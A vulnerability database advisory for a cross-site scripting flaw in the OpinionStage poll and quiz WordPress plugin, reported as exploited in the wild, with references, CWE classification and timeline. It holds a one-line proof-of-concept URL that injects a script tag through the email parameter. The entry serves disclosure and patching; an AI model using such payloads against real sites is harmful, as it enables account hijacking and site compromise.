Poll, Survey, Form & Quiz Maker by OpinionStage < 19.6.25 - Unauthenticated Cross-Site Scripting (XSS)



Description

This vulnerability has been seen actively exploited in the wild.

Proof of Concept

http://www.example.com/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email="><script>alert(1)</script>

Affects Plugin

References

URL https://www.pluginvulnerabilities.com/2019/09/16/hackers-may-already-be-targeting-this-persistent-xss-vulnerability-in-poll-survey-form-quiz-maker-by-opinionstage/
URL https://plugins.trac.wordpress.org/changeset/2158590/social-polls-by-opinionstage

Classification

Type XSS
OWASP Top 10 A7: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Verified No
WPVDB ID 10080

Timeline

Publicly Published 2019-09-16
Added 2020-02-20
Last Updated 2020-02-21
